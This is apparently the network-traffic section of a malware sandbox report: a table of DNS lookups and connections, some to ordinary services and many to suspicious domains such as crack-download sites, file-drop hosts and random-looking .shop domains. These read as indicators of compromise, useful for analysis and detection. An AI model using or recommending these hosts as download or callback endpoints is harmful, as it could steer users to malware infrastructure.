| US | 8.8.8.8:53 | 83.62.189.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 85.65.42.20.in-addr.arpa | udp |
| US | 52.35.108.230:443 | www.threatcrowd.org | tcp |
| GB | 54.38.210.150:443 | tcp | |
| US | 8.8.8.8:53 | 230.108.35.52.in-addr.arpa | udp |
| US | 172.67.178.57:443 | direct25845.mitoerliste.space | udp |
| US | 104.21.39.249:443 | spacedowns.com | udp |
| GB | 157.240.221.35:443 | www.facebook.com | udp |
| US | 8.8.8.8:53 | service-domain.xyz | udp |
| US | 54.210.117.250:443 | service-domain.xyz | tcp |
| US | 8.8.8.8:53 | 250.117.210.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 177.101.63.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| GB | 142.250.187.238:443 | clients2.google.com | tcp |
| US | 8.8.8.8:53 | clients2.googleusercontent.com | udp |
| GB | 172.217.16.225:443 | clients2.googleusercontent.com | tcp |
| US | 8.8.8.8:53 | 67.169.217.172.in-addr.arpa | udp |
| GB | 142.250.187.238:443 | clients2.google.com | tcp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 142.250.179.238:443 | play.google.com | udp |
| GB | 142.250.179.238:443 | play.google.com | tcp |
| US | 8.8.8.8:53 | 238.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| US | 8.8.8.8:53 | soneservice.shop | udp |
| GB | 142.250.187.238:443 | clients2.google.com | udp |
| GB | 142.250.187.238:443 | clients2.google.com | tcp |
| US | 172.67.164.12:80 | soneservice.shop | tcp |
| US | 8.8.8.8:53 | api2.check-data.xyz | udp |
| US | 8.8.8.8:53 | 12.164.67.172.in-addr.arpa | udp |
| US | 44.237.26.169:80 | api2.check-data.xyz | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 169.26.237.44.in-addr.arpa | udp |
| US | 8.8.8.8:53 | joseernestoongithub.github.io | udp |
| US | 8.8.8.8:53 | translate.google.com | udp |
| US | 8.8.8.8:53 | translate-pa.googleapis.com | udp |
| US | 185.199.111.153:443 | joseernestoongithub.github.io | tcp |
| US | 8.8.8.8:53 | 10.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | insadecoplim.pro | udp |
| US | 104.21.41.38:443 | insadecoplim.pro | tcp |
| US | 104.21.41.38:443 | insadecoplim.pro | tcp |
| US | 8.8.8.8:53 | scudspatioseparatist.com | udp |
| NL | 188.72.236.34:443 | scudspatioseparatist.com | tcp |
| US | 8.8.8.8:53 | grounddetail.website | udp |
| US | 172.67.132.40:443 | grounddetail.website | tcp |
| US | 8.8.8.8:53 | 38.41.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.236.72.188.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 40.132.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | nowforfile.com | udp |
| US | 172.67.133.40:443 | nowforfile.com | tcp |
| US | 172.67.133.40:443 | nowforfile.com | tcp |
| US | 8.8.8.8:53 | yourjsdelivery.com | udp |
| US | 8.8.8.8:53 | code.jquery.com | udp |
| US | 8.8.8.8:53 | maxcdn.bootstrapcdn.com | udp |
| US | 151.101.66.137:443 | code.jquery.com | tcp |
| US | 172.67.68.197:443 | yourjsdelivery.com | tcp |
| US | 104.18.11.207:443 | maxcdn.bootstrapcdn.com | tcp |
| US | 8.8.8.8:53 | 40.133.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 137.66.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 197.68.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | nostop.go2cloud.org | udp |
| IE | 52.210.2.133:443 | nostop.go2cloud.org | tcp |
| US | 8.8.8.8:53 | translate.googleapis.com | udp |
| GB | 142.250.187.202:443 | translate.googleapis.com | udp |
| GB | 142.250.187.202:443 | translate.googleapis.com | tcp |
| US | 8.8.8.8:53 | 133.2.210.52.in-addr.arpa | udp |
| US | 172.67.133.40:443 | nowforfile.com | udp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | udp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | tcp |
| US | 8.8.8.8:53 | www.7-zip.org | udp |
| DE | 49.12.202.237:443 | www.7-zip.org | tcp |
| DE | 49.12.202.237:443 | www.7-zip.org | tcp |
| US | 8.8.8.8:53 | 237.202.12.49.in-addr.arpa | udp |
| US | 8.8.8.8:53 | trk.playstretch.host | udp |
| IE | 54.155.11.60:443 | trk.playstretch.host | tcp |
| US | 8.8.8.8:53 | 60.11.155.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | sup4tsk.biz | udp |
| SE | 185.117.88.39:80 | sup4tsk.biz | tcp |
| US | 8.8.8.8:53 | 39.88.117.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rouonixon.com | udp |
| US | 8.8.8.8:53 | rouonixon.com | udp |
| NL | 139.45.197.238:443 | rouonixon.com | tcp |
| US | 8.8.8.8:53 | my.rtmark.net | udp |
| US | 8.8.8.8:53 | my.rtmark.net | udp |
| NL | 139.45.195.8:443 | my.rtmark.net | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | beincrypto-com.webpkgcache.com | udp |
| US | 8.8.8.8:53 | beincrypto-com.webpkgcache.com | udp |
| GB | 216.58.212.225:443 | beincrypto-com.webpkgcache.com | tcp |
| US | 8.8.8.8:53 | i.ytimg.com | udp |
| US | 8.8.8.8:53 | i.ytimg.com | udp |
| US | 8.8.8.8:53 | 238.197.45.139.in-addr.arpa | udp |
| GB | 142.250.187.214:443 | i.ytimg.com | tcp |
| GB | 142.250.187.214:443 | i.ytimg.com | tcp |
| US | 8.8.8.8:53 | 8.195.45.139.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.212.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.youtube.com | udp |
| US | 8.8.8.8:53 | www.youtube.com | udp |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| GB | 216.58.212.206:443 | www.youtube.com | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 142.250.179.238:443 | play.google.com | tcp |
| GB | 142.250.179.238:443 | play.google.com | udp |
| US | 8.8.8.8:53 | 214.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.4.4:443 | dns.google | tcp |
| US | 8.8.4.4:443 | dns.google | tcp |
| US | 8.8.8.8:53 | service-domain.xyz | udp |
| US | 54.210.117.250:443 | service-domain.xyz | tcp |
| US | 8.8.8.8:53 | 4.4.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 164.189.21.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| US | 8.8.8.8:53 | api3.check-data.xyz | udp |
| US | 8.8.8.8:53 | www.rapidfilestorage.com | udp |
| US | 44.237.26.169:443 | api3.check-data.xyz | tcp |
| US | 44.237.26.169:443 | api3.check-data.xyz | tcp |
| KZ | 185.22.66.15:80 | www.rapidfilestorage.com | tcp |
| US | 8.8.8.8:53 | apis.google.com | udp |
| GB | 142.250.200.14:443 | apis.google.com | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| US | 8.8.8.8:53 | rfiles5.tracemonitors.com | udp |
| GB | 142.250.179.238:443 | play.google.com | udp |
| RU | 80.78.240.92:80 | rfiles5.tracemonitors.com | tcp |
| GB | 142.250.179.238:443 | play.google.com | tcp |
| RU | 80.78.240.92:443 | rfiles5.tracemonitors.com | tcp |
| RU | 80.78.240.92:443 | rfiles5.tracemonitors.com | tcp |
| US | 8.8.8.8:53 | rfiles1.tracemonitors.com | udp |
| RU | 80.78.240.92:443 | rfiles1.tracemonitors.com | tcp |
| US | 8.8.8.8:53 | 15.66.22.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 92.240.78.80.in-addr.arpa | udp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| GB | 142.250.187.238:443 | clients2.google.com | udp |
| GB | 142.250.187.238:443 | clients2.google.com | tcp |
| US | 8.8.8.8:53 | clients72.google.com | udp |
| US | 8.8.4.4:443 | dns.google | udp |
| GB | 142.250.200.2:443 | tcp | |
| GB | 216.58.213.6:443 | tcp | |
| GB | 142.250.200.2:443 | udp | |
| US | 8.8.8.8:53 | 2.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 6.213.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | service-domain.xyz | udp |
| US | 54.210.117.250:443 | service-domain.xyz | tcp |
| GB | 142.250.200.2:443 | udp | |
| US | 8.8.8.8:53 | 234.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| GB | 142.250.187.238:443 | clients2.google.com | udp |
| GB | 142.250.187.238:443 | clients2.google.com | tcp |
| US | 8.8.8.8:53 | clients24.google.com | udp |
| US | 8.8.8.8:53 | clients24.google.com | udp |
| US | 8.8.8.8:53 | joseernestoongithub.github.io | udp |
| US | 185.199.111.153:443 | joseernestoongithub.github.io | tcp |
| US | 8.8.8.8:53 | api2.tracemonitors.com | udp |
| US | 8.8.8.8:53 | translate.google.com | udp |
| US | 44.237.26.169:443 | api2.tracemonitors.com | tcp |
| US | 44.237.26.169:443 | api2.tracemonitors.com | tcp |
| US | 8.8.8.8:53 | translate-pa.googleapis.com | udp |
| GB | 216.58.213.10:443 | translate-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | translate.googleapis.com | udp |
| GB | 142.250.180.10:443 | translate.googleapis.com | udp |
| US | 8.8.8.8:53 | 10.180.250.142.in-addr.arpa | udp |
| SE | 45.155.250.90:53 | bflzpny.com | udp |
| US | 8.8.8.8:53 | 90.250.155.45.in-addr.arpa | udp |
| BG | 79.110.49.184:80 | bflzpny.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 8.8.8.8:53 | 184.49.110.79.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.173.154.195.in-addr.arpa | udp |
| US | 8.8.8.8:53 | clients24.google.com | udp |
| US | 8.8.8.8:53 | trycracksetup.com | udp |
| UA | 31.42.187.42:443 | trycracksetup.com | tcp |
| UA | 31.42.187.42:443 | trycracksetup.com | tcp |
| US | 8.8.8.8:53 | 42.187.42.31.in-addr.arpa | udp |
| US | 8.8.8.8:53 | static.addtoany.com | udp |
| US | 8.8.8.8:53 | stats.wp.com | udp |
| US | 8.8.8.8:53 | v0.wordpress.com | udp |
| US | 8.8.8.8:53 | stats.wp.com | udp |
| US | 8.8.8.8:53 | static.addtoany.com | udp |
| US | 8.8.8.8:53 | ktrfvcf.cfd | udp |
| US | 192.0.76.3:443 | stats.wp.com | tcp |
| US | 104.22.71.197:443 | static.addtoany.com | tcp |
| US | 104.21.22.131:443 | ktrfvcf.cfd | tcp |
| US | 8.8.8.8:53 | 197.71.22.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.76.0.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.22.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | service-domain.xyz | udp |
| US | 54.210.117.250:443 | service-domain.xyz | tcp |
| US | 8.8.4.4:443 | dns.google | udp |
| GB | 142.250.179.238:443 | play.google.com | udp |
| GB | 142.250.179.238:443 | play.google.com | udp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| GB | 142.250.187.238:443 | clients2.google.com | udp |
| GB | 142.250.187.238:443 | clients2.google.com | tcp |
| US | 8.8.8.8:53 | clients68.google.com | udp |
| US | 8.8.8.8:53 | nowforfile.com | udp |
| US | 104.21.5.72:443 | nowforfile.com | tcp |
| US | 104.21.5.72:443 | nowforfile.com | tcp |
| US | 8.8.8.8:53 | yourjsdelivery.com | udp |
| US | 104.26.2.174:443 | yourjsdelivery.com | tcp |
| US | 8.8.8.8:53 | 72.5.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | nostop.go2cloud.org | udp |
| IE | 52.210.174.128:443 | nostop.go2cloud.org | tcp |
| US | 8.8.8.8:53 | 128.174.210.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | clients68.google.com | udp |
| US | 8.8.8.8:53 | joseernestoongithub.github.io | udp |
| US | 8.8.8.8:53 | translate.google.com | udp |
| US | 8.8.8.8:53 | translate-pa.googleapis.com | udp |
| US | 185.199.108.153:443 | joseernestoongithub.github.io | tcp |
| US | 8.8.8.8:53 | 153.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | trycracksetup.com | udp |
| UA | 31.42.187.42:443 | trycracksetup.com | tcp |
| UA | 31.42.187.42:443 | trycracksetup.com | tcp |
| US | 8.8.4.4:443 | dns.google | udp |
| GB | 216.58.204.67:443 | update.googleapis.com | tcp |
| US | 8.8.8.8:53 | translate.googleapis.com | udp |
| US | 8.8.8.8:53 | static.addtoany.com | udp |
| US | 8.8.8.8:53 | stats.wp.com | udp |
| US | 8.8.8.8:53 | v0.wordpress.com | udp |
| US | 8.8.8.8:53 | ktrfvcf.cfd | udp |
| US | 104.21.22.131:443 | ktrfvcf.cfd | tcp |
| US | 8.8.8.8:53 | monitor.repocket.com | udp |
| US | 172.67.202.35:443 | monitor.repocket.com | tcp |
| US | 8.8.8.8:53 | clients68.google.com | udp |
| US | 8.8.8.8:53 | pixel.wp.com | udp |
| US | 8.8.8.8:53 | content-autofill.googleapis.com | udp |
| US | 192.0.76.3:443 | pixel.wp.com | tcp |
| GB | 142.250.179.234:443 | content-autofill.googleapis.com | udp |
| US | 104.22.70.197:443 | static.addtoany.com | tcp |
| US | 104.22.70.197:443 | static.addtoany.com | tcp |
| GB | 142.250.179.234:443 | content-autofill.googleapis.com | tcp |
| US | 104.22.70.197:443 | static.addtoany.com | udp |
| US | 8.8.8.8:53 | 234.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.202.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 197.70.22.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | oeu56e8f.click | udp |
| US | 172.67.159.57:443 | oeu56e8f.click | tcp |
| US | 172.67.159.57:443 | oeu56e8f.click | tcp |
| US | 8.8.8.8:53 | google.com | udp |
| US | 172.67.159.57:443 | oeu56e8f.click | udp |
| US | 8.8.8.8:53 | a.nel.cloudflare.com | udp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | udp |
| US | 8.8.8.8:53 | 57.159.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 123.35.104.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | z503cuyi.xyz | udp |
| US | 172.67.196.220:443 | z503cuyi.xyz | tcp |
| US | 172.67.196.220:443 | z503cuyi.xyz | tcp |
| US | 8.8.8.8:53 | cdnjs.cloudflare.com | udp |
| US | 8.8.8.8:53 | cdn.jsdelivr.net | udp |
| US | 8.8.8.8:53 | code.jquery.com | udp |
| US | 151.101.1.229:443 | cdn.jsdelivr.net | udp |
| US | 104.17.24.14:443 | cdnjs.cloudflare.com | udp |
| US | 151.101.66.137:443 | code.jquery.com | tcp |
| US | 151.101.66.137:443 | code.jquery.com | tcp |
| US | 104.17.24.14:443 | cdnjs.cloudflare.com | tcp |
| US | 172.67.196.220:443 | z503cuyi.xyz | udp |
| US | 8.8.8.8:53 | 220.196.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | dl.dropboxusercontent.com | udp |
| GB | 162.125.64.15:443 | dl.dropboxusercontent.com | tcp |
| GB | 162.125.64.15:443 | dl.dropboxusercontent.com | tcp |
| US | 8.8.8.8:53 | 15.64.125.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | service-domain.xyz | udp |
| US | 54.210.117.250:443 | service-domain.xyz | tcp |
| US | 8.8.8.8:53 | z503cuyi.xyz | udp |
| US | 104.21.60.135:443 | z503cuyi.xyz | tcp |
| US | 104.21.60.135:443 | z503cuyi.xyz | tcp |
| US | 8.8.8.8:53 | 135.60.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | trycracksetup.com | udp |
| US | 8.8.8.8:53 | joseernestoongithub.github.io | udp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| GB | 142.250.187.238:443 | clients2.google.com | udp |
| UA | 31.42.187.42:443 | trycracksetup.com | tcp |
| UA | 31.42.187.42:443 | trycracksetup.com | tcp |
| US | 185.199.108.153:443 | joseernestoongithub.github.io | tcp |
| GB | 142.250.187.238:443 | clients2.google.com | tcp |
| US | 8.8.8.8:53 | clients88.google.com | udp |
| US | 8.8.8.8:53 | static.addtoany.com | udp |
| US | 172.67.39.148:443 | static.addtoany.com | tcp |
| US | 8.8.8.8:53 | translate.google.com | udp |
| US | 8.8.8.8:53 | translate-pa.googleapis.com | udp |
| GB | 142.250.180.10:443 | translate-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | 148.39.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | stats.wp.com | udp |
| US | 8.8.8.8:53 | v0.wordpress.com | udp |
| US | 8.8.8.8:53 | ktrfvcf.cfd | udp |
| US | 104.21.22.131:443 | ktrfvcf.cfd | tcp |
| US | 8.8.8.8:53 | clients88.google.com | udp |
| US | 8.8.8.8:53 | translate.googleapis.com | udp |
| GB | 216.58.204.67:443 | update.googleapis.com | udp |
| GB | 142.250.178.10:443 | translate.googleapis.com | udp |
| GB | 142.250.178.10:443 | translate.googleapis.com | tcp |
| US | 8.8.8.8:53 | clients88.google.com | udp |
| BG | 79.110.49.184:80 | bflzpny.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 8.8.8.8:53 | pixel.wp.com | udp |
| US | 192.0.76.3:443 | pixel.wp.com | tcp |
| US | 8.8.8.8:53 | u5ja1cdb.click | udp |
| US | 104.21.65.115:443 | u5ja1cdb.click | tcp |
| US | 104.21.65.115:443 | u5ja1cdb.click | tcp |
| US | 8.8.8.8:53 | 115.65.21.104.in-addr.arpa | udp |
| US | 104.21.65.115:443 | u5ja1cdb.click | udp |
| US | 8.8.8.8:53 | a.nel.cloudflare.com | udp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | udp |
| US | 8.8.8.8:53 | 86cgbtmw.xyz | udp |
| US | 172.67.158.14:443 | 86cgbtmw.xyz | tcp |
| US | 172.67.158.14:443 | 86cgbtmw.xyz | tcp |
| US | 8.8.8.8:53 | cdnjs.cloudflare.com | udp |
| US | 8.8.8.8:53 | cdn.jsdelivr.net | udp |
| US | 8.8.8.8:53 | code.jquery.com | udp |
| US | 151.101.1.229:443 | cdn.jsdelivr.net | udp |
| US | 104.17.24.14:443 | cdnjs.cloudflare.com | udp |
| US | 151.101.130.137:443 | code.jquery.com | tcp |
| US | 151.101.130.137:443 | code.jquery.com | tcp |
| US | 172.67.158.14:443 | 86cgbtmw.xyz | udp |
| US | 8.8.8.8:53 | 14.158.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 137.130.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | dl.dropboxusercontent.com | udp |
| GB | 162.125.64.15:443 | dl.dropboxusercontent.com | tcp |
| GB | 162.125.64.15:443 | dl.dropboxusercontent.com | tcp |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.8.8:53 | www.youtube.com | udp |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| GB | 142.250.200.2:443 | udp | |
| GB | 142.250.200.2:443 | udp | |
| US | 8.8.8.8:53 | imap.web.de | udp |
| DE | 212.227.17.162:993 | imap.web.de | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 8.8.8.8:53 | 162.17.227.212.in-addr.arpa | udp |
| RU | 93.186.237.1:443 | oauth.vk.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 8.8.8.8:53 | clients88.google.com | udp |
| US | 8.8.8.8:53 | 1.237.186.93.in-addr.arpa | udp |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| BG | 79.110.49.184:80 | bflzpny.com | tcp |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 8.8.8.8:53 | www.google.de | udp |
| GB | 142.250.187.227:443 | www.google.de | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 8.8.8.8:53 | 227.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cloudsaze.com | udp |
| US | 172.67.186.32:80 | cloudsaze.com | tcp |
| US | 172.67.186.32:80 | cloudsaze.com | tcp |
| US | 172.67.186.32:443 | cloudsaze.com | tcp |
| US | 8.8.8.8:53 | google.com | udp |
| GB | 142.250.178.14:443 | google.com | tcp |
| US | 8.8.8.8:53 | 32.186.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | counter.yadro.ru | udp |
| RU | 88.212.201.198:443 | counter.yadro.ru | tcp |
| US | 172.67.186.32:443 | cloudsaze.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 8.8.8.8:53 | 198.201.212.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | zamesoczxuswe.site | udp |
| US | 172.67.160.12:443 | zamesoczxuswe.site | tcp |
| US | 172.67.160.12:443 | zamesoczxuswe.site | tcp |
| US | 172.67.160.12:443 | zamesoczxuswe.site | udp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | udp |
| US | 151.101.1.229:443 | cdn.jsdelivr.net | udp |
| US | 104.17.24.14:443 | cdnjs.cloudflare.com | udp |
| US | 104.17.24.14:443 | cdnjs.cloudflare.com | udp |
| US | 8.8.8.8:53 | 12.160.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | s.youtube.com | udp |
| BE | 74.125.206.113:443 | s.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 8.8.8.8:53 | 113.206.125.74.in-addr.arpa | udp |
| US | 8.8.8.8:53 | work.a-poster.info | udp |
| NL | 37.1.217.172:25000 | work.a-poster.info | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 8.8.8.8:53 | 172.217.1.37.in-addr.arpa | udp |
| BE | 74.125.206.113:443 | s.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 8.8.8.8:53 | nav-edge.smartscreen.microsoft.com | udp |
| US | 8.8.8.8:53 | nav-edge.smartscreen.microsoft.com | udp |
| US | 8.8.8.8:53 | zamesoczxuswe.site | udp |
| US | 8.8.8.8:53 | zamesoczxuswe.site | udp |
| US | 8.8.8.8:53 | api.check-data.xyz | udp |
| US | 8.8.8.8:53 | api.check-data.xyz | udp |
| US | 8.8.8.8:53 | update.googleapis.com | udp |
| US | 8.8.8.8:53 | update.googleapis.com | udp |
| US | 172.67.160.12:443 | zamesoczxuswe.site | udp |
| GB | 51.140.242.104:443 | nav-edge.smartscreen.microsoft.com | tcp |
| US | 8.8.8.8:53 | clients41.google.com | udp |
| US | 8.8.8.8:53 | clients41.google.com | udp |
| US | 8.8.8.8:53 | www.rapidfilestorage.com | udp |
| US | 8.8.8.8:53 | www.rapidfilestorage.com | udp |
| US | 172.67.160.12:443 | zamesoczxuswe.site | tcp |
| US | 8.8.8.8:53 | api.edgeoffer.microsoft.com | udp |
| US | 8.8.8.8:53 | api.edgeoffer.microsoft.com | udp |
| US | 8.8.8.8:53 | business.bing.com | udp |
| US | 8.8.8.8:53 | business.bing.com | udp |
| IE | 94.245.104.56:443 | api.edgeoffer.microsoft.com | tcp |
| US | 44.237.26.169:443 | api.check-data.xyz | tcp |
| GB | 216.58.204.67:443 | update.googleapis.com | tcp |
| US | 13.107.6.158:443 | business.bing.com | tcp |
| US | 8.8.8.8:53 | clients41.google.com | udp |
| US | 8.8.8.8:53 | clients41.google.com | udp |
| US | 8.8.8.8:53 | clients41.google.com | udp |
| KZ | 185.22.66.16:80 | www.rapidfilestorage.com | tcp |
| GB | 51.140.242.104:443 | nav-edge.smartscreen.microsoft.com | tcp |
| GB | 51.140.242.104:443 | nav-edge.smartscreen.microsoft.com | tcp |
| KZ | 185.22.66.16:80 | www.rapidfilestorage.com | tcp |
| US | 13.107.6.158:443 | business.bing.com | tcp |
| US | 13.107.6.158:443 | business.bing.com | tcp |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.8.8:53 | cdnjs.cloudflare.com | udp |
| US | 8.8.8.8:53 | cdnjs.cloudflare.com | udp |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.8.8:53 | google.com | udp |
| US | 104.17.25.14:443 | cdnjs.cloudflare.com | udp |
| US | 8.8.8.8:53 | bzib.nelreports.net | udp |
| US | 8.8.8.8:53 | bzib.nelreports.net | udp |
| GB | 142.250.178.14:443 | google.com | tcp |
| US | 2.17.251.4:443 | bzib.nelreports.net | tcp |
| US | 8.8.8.8:53 | 56.104.245.94.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.242.140.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.66.22.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rfiles5.tracemonitors.com | udp |
| US | 8.8.8.8:53 | rfiles5.tracemonitors.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| RU | 80.78.240.92:80 | rfiles5.tracemonitors.com | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| US | 8.8.8.8:53 | rfiles5.tracemonitors.com | udp |
| US | 8.8.8.8:53 | rfiles5.tracemonitors.com | udp |
| US | 8.8.8.8:53 | rfiles3.tracemonitors.com | udp |
| US | 8.8.8.8:53 | rfiles3.tracemonitors.com | udp |
| RU | 80.78.240.92:443 | rfiles3.tracemonitors.com | tcp |
| RU | 80.78.240.92:443 | rfiles3.tracemonitors.com | tcp |
| RU | 80.78.240.92:443 | rfiles3.tracemonitors.com | tcp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 4.251.17.2.in-addr.arpa | udp |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| US | 8.8.8.8:53 | clients41.google.com | udp |
| US | 8.8.8.8:53 | clients41.google.com | udp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 8.8.8.8:53 | clients41.google.com | udp |
| US | 8.8.8.8:53 | clients41.google.com | udp |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| FR | 195.154.173.35:2023 | tcp | |
| NL | 23.62.61.97:443 | www.bing.com | udp |
| US | 8.8.8.8:53 | zamesoczxuswe.site | udp |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | tubewelfaredopw.shop | udp |
| US | 172.67.142.104:443 | tubewelfaredopw.shop | tcp |
| US | 8.8.8.8:53 | 104.142.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | museumtespaceorsp.shop | udp |
| US | 172.67.184.107:443 | museumtespaceorsp.shop | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 104.17.25.14:443 | cdnjs.cloudflare.com | udp |
| US | 8.8.8.8:53 | buttockdecarderwiso.shop | udp |
| US | 104.21.45.202:443 | buttockdecarderwiso.shop | tcp |
| US | 8.8.8.8:53 | fenesworcsema.site | udp |
| US | 8.8.8.8:53 | fenesworcsema.site | udp |
| US | 8.8.8.8:53 | fenesworcsema.site | udp |
| US | 104.21.81.204:443 | fenesworcsema.site | udp |
| US | 8.8.8.8:53 | averageaattractiionsl.shop | udp |
| US | 172.67.220.163:443 | averageaattractiionsl.shop | tcp |
| US | 8.8.8.8:53 | 107.184.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 202.45.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 204.81.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 163.220.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | femininiespywageg.shop | udp |
| US | 104.21.71.3:443 | femininiespywageg.shop | tcp |
| US | 8.8.8.8:53 | employhabragaomlsp.shop | udp |
| US | 172.67.203.218:443 | employhabragaomlsp.shop | tcp |
